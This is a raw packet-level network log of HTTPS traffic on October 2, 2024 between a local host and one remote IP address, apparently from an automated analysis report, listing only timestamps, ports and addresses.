Oct 2, 2024 06:25:31.858622074 CEST	49736	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:31.858675957 CEST	49736	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:31.858676910 CEST	49736	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:31.858685017 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:31.908866882 CEST	49736	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:31.941836119 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:31.941860914 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:31.941941023 CEST	49736	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:31.941941023 CEST	49736	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:31.941963911 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:31.942049980 CEST	49736	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:31.942457914 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:31.942473888 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:31.942533016 CEST	49736	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:31.942539930 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:31.943362951 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:31.943382025 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:31.943418980 CEST	49736	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:31.943419933 CEST	49736	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:31.943430901 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:31.943458080 CEST	49736	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:31.944192886 CEST	49736	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:31.944648981 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:31.944663048 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:31.944834948 CEST	49736	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:31.944839954 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:31.945538998 CEST	49736	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:31.945595026 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:31.945609093 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:31.946212053 CEST	49736	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:31.946218014 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:31.946270943 CEST	49736	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:32.009938002 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.009958029 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.010023117 CEST	49736	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:32.010039091 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.010071039 CEST	49736	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:32.010082006 CEST	49736	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:32.019046068 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.019066095 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.019124985 CEST	49736	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:32.019134998 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.019169092 CEST	49736	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:32.028147936 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.028167009 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.028249025 CEST	49736	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:32.028249025 CEST	49736	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:32.028259039 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.028296947 CEST	49736	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:32.028513908 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.028528929 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.028563976 CEST	49736	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:32.028568029 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.028594017 CEST	49736	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:32.028609037 CEST	49736	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:32.029411077 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.029433012 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.029467106 CEST	49736	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:32.029470921 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.029504061 CEST	49736	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:32.029516935 CEST	49736	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:32.029967070 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.029992104 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.030035019 CEST	49736	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:32.030039072 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.030070066 CEST	49736	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:32.030086994 CEST	49736	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:32.030705929 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.030719995 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.030778885 CEST	49736	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:32.030785084 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.030826092 CEST	49736	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:32.031805992 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.031827927 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.031871080 CEST	49736	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:32.031874895 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.031903982 CEST	49736	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:32.031914949 CEST	49736	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:32.096035004 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.096064091 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.096128941 CEST	49736	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:32.096147060 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.096215963 CEST	49736	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:32.105101109 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.105125904 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.105182886 CEST	49736	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:32.105192900 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.105233908 CEST	49736	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:32.114583969 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.114614010 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.114701033 CEST	49736	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:32.114711046 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.114753962 CEST	49736	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:32.115219116 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.115241051 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.115283012 CEST	49736	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:32.115288019 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.115320921 CEST	49736	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:32.115334988 CEST	49736	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:32.115679979 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.115695000 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.115768909 CEST	49736	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:32.115773916 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.115971088 CEST	49736	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:32.116189003 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.116206884 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.116255999 CEST	49736	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:32.116260052 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.116288900 CEST	49736	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:32.116317987 CEST	49736	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:32.119415045 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.119436026 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.119477034 CEST	49736	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:32.119482994 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.119520903 CEST	49736	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:32.119538069 CEST	49736	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:32.119925976 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.119941950 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.119976044 CEST	49736	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:32.119980097 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.120012999 CEST	49736	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:32.120027065 CEST	49736	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:32.182512045 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.182535887 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.182583094 CEST	49736	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:32.182595968 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.182610035 CEST	49736	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:32.182679892 CEST	49736	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:32.191349030 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.191365004 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.191416979 CEST	49736	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:32.191423893 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.191436052 CEST	49736	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:32.191462994 CEST	49736	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:32.200877905 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.200896978 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.200946093 CEST	49736	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:32.200953007 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.200975895 CEST	49736	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:32.201004982 CEST	49736	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:32.201527119 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.201545000 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.201586008 CEST	49736	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:32.201591015 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.201616049 CEST	49736	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:32.201627016 CEST	49736	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:32.202162027 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.202179909 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.202229023 CEST	49736	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:32.202234983 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.202265978 CEST	49736	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:32.202303886 CEST	49736	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:32.202519894 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.202536106 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.202579975 CEST	49736	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:32.202585936 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.202596903 CEST	49736	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:32.202625036 CEST	49736	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:32.203381062 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.203402042 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.203449965 CEST	49736	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:32.203454971 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.203525066 CEST	49736	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:32.203876019 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.203891993 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.203937054 CEST	49736	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:32.203943014 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.203960896 CEST	49736	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:32.203982115 CEST	49736	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:32.268863916 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.268882990 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.268943071 CEST	49736	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:32.268954992 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.268981934 CEST	49736	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:32.269000053 CEST	49736	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:32.277585030 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.277606010 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.277659893 CEST	49736	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:32.277676105 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.277693987 CEST	49736	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:32.277719975 CEST	49736	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:32.287458897 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.287477970 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.287540913 CEST	49736	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:32.287547112 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.287587881 CEST	49736	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:32.287945032 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.287961006 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.287996054 CEST	49736	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:32.288001060 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.288032055 CEST	49736	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:32.288042068 CEST	49736	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:32.288515091 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.288528919 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.288589954 CEST	49736	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:32.288595915 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.288633108 CEST	49736	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:32.288943052 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.288955927 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.289004087 CEST	49736	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:32.289010048 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.289030075 CEST	49736	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:32.289071083 CEST	49736	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:32.289671898 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.289689064 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.289745092 CEST	49736	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:32.289751053 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.289792061 CEST	49736	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:32.290215015 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.290230989 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.290286064 CEST	49736	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:32.290292025 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.290330887 CEST	49736	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:32.355402946 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.355424881 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.355484009 CEST	49736	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:32.355501890 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.355550051 CEST	49736	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:32.364036083 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.364061117 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.364121914 CEST	49736	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:32.364135981 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.364180088 CEST	49736	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:32.373606920 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.373636007 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.373688936 CEST	49736	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:32.373703957 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.373729944 CEST	49736	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:32.373745918 CEST	49736	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:32.374176025 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.374192953 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.374258995 CEST	49736	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:32.374264956 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.374381065 CEST	49736	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:32.374732971 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.374747992 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.374820948 CEST	49736	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:32.374825954 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.374875069 CEST	49736	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:32.375334024 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.375349045 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.375417948 CEST	49736	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:32.375425100 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.375467062 CEST	49736	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:32.375588894 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.375605106 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.375664949 CEST	49736	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:32.375669956 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.375709057 CEST	49736	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:32.376372099 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.376386881 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.376446962 CEST	49736	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:32.376452923 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.376492023 CEST	49736	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:32.441772938 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.441797018 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.441868067 CEST	49736	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:32.441890001 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.441975117 CEST	49736	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:32.450393915 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.450411081 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.450439930 CEST	49736	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:32.450493097 CEST	49736	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:32.450500011 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.450572968 CEST	49736	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:32.460041046 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.460057020 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.460117102 CEST	49736	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:32.460130930 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.460172892 CEST	49736	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:32.460515976 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.460531950 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.460583925 CEST	49736	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:32.460588932 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.460846901 CEST	49736	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:32.461178064 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.461193085 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.461263895 CEST	49736	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:32.461270094 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.461307049 CEST	49736	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:32.461637974 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.461658955 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.461714029 CEST	49736	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:32.461719036 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.461757898 CEST	49736	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:32.462426901 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.462443113 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.462491989 CEST	49736	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:32.462496996 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.462536097 CEST	49736	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:32.462897062 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.462913036 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.462951899 CEST	49736	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:32.462956905 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.462979078 CEST	49736	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:32.462996006 CEST	49736	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:32.530276060 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.530292034 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.530365944 CEST	49736	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:32.530390024 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.530472994 CEST	49736	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:32.536734104 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.536748886 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.536808014 CEST	49736	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:32.536819935 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.536858082 CEST	49736	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:32.546355009 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.546370983 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.546437979 CEST	49736	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:32.546451092 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.546490908 CEST	49736	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:32.547007084 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.547025919 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.547238111 CEST	49736	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:32.547247887 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.547293901 CEST	49736	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:32.547553062 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.547568083 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.547626019 CEST	49736	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:32.547631979 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.547672033 CEST	49736	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:32.548049927 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.548065901 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.548121929 CEST	49736	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:32.548127890 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.548167944 CEST	49736	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:32.548345089 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.548358917 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.548415899 CEST	49736	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:32.548422098 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.548459053 CEST	49736	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:32.549093008 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.549112082 CEST	443	49736	79.110.49.16	192.168.2.6
